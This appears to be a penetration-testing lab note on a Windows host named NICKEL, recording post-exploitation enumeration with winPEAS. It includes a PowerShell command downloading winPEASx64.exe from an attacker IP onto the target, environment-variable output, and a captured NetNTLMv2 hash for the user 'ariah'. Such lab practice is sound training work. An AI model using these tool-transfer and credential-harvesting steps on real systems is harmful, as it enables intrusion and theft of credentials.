PEAS


Conducting automated enumeration after performing manual enumeration

PS C:\Users\ariah> iwr -Uri http://192.168.45.153/winPEASx64.exe -OutFile .\winPEASx64.exe

Delivery complete

Executing PEAS

ENV


╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables 
    SystemDrive: C:
    ProgramFiles(x86): C:\Program Files (x86)
    Path: C:\Program Files\OpenSSH\OpenSSH-Win64;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\ariah\AppData\Local\Microsoft\WindowsApps;
    ProgramW6432: C:\Program Files
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    TMP: C:\Users\ariah\AppData\Local\Temp
    PROCESSOR_ARCHITECTURE: AMD64
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    PROCESSOR_REVISION: 0101
    TEMP: C:\Users\ariah\AppData\Local\Temp
    USERPROFILE: C:\Users\ariah
    USER: ariah
    TERM: xterm-256color
    USERNAME: ariah
    SystemRoot: C:\Windows
    CommonProgramFiles: C:\Program Files\Common Files
    LOGNAME: ariah
    ProgramData: C:\ProgramData
    HOMEPATH: \Users\ariah
    COMPUTERNAME: NICKEL
    ALLUSERSPROFILE: C:\ProgramData
    SSH_CONNECTION: 192.168.45.153 45852 192.168.219.99 22
    SHELL: c:\windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    HOMEDRIVE: C:
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    OS: Windows_NT
    ProgramFiles: C:\Program Files
    ComSpec: C:\Windows\system32\cmd.exe
    HOME: C:\Users\ariah
    PSModulePath: C:\Users\ariah\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROMPT: ariah@NICKEL $P$G
    SSH_CLIENT: 192.168.45.153 45852 22
    APPDATA: C:\Users\ariah\AppData\Roaming
    USERDOMAIN: WORKGROUP
    PROCESSOR_LEVEL: 25
    LOCALAPPDATA: C:\Users\ariah\AppData\Local
    CommonProgramW6432: C:\Program Files\Common Files
    SSH_TTY: windows-pty
    PSExecutionPolicyPreference: Bypass
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    PUBLIC: C:\Users\Public
 
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

LAPS


LSA Protection


Credentials Guard


Cached Creds


UAC


PowerShell


C:\Users\ariah\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

NTLM


ariah::NICKEL:1122334455667788:0e1cb50fb765f7952688d9ba14828230:01010000000000008c7b94d60b8edb017e5b76830be825be000000000800300030000000000000000000000000200000dc8dc6ff2916f75b4e8f9150c1df89971f66c4c75915bc8ef5fde82171dfe73b0a00100000000000000000000000000000000000090000000000000000000000

Network